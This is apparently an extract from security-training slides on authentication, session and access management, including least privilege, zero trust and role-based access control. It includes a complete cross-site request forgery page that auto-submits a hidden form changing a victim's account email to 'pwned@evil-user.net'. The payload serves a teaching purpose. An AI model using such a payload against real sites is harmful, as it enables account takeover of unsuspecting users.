- Authentication & Password Management
- Token & Session Management
- Authorization & Access Management
Asjad Saboor
<html>
<body>
<form action="https://vulnerable-website.com/email/change" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Set of rules that governs
what actions some users or Group of users can perform.
Who uses what resource,when and in what amounts
Defined by Business needs / Requirements.
ACL, RBAC, ABAC ...
Ideal to follow the principle of least privilege.
Adopt zero-trust security model.
Check on every request at back-end.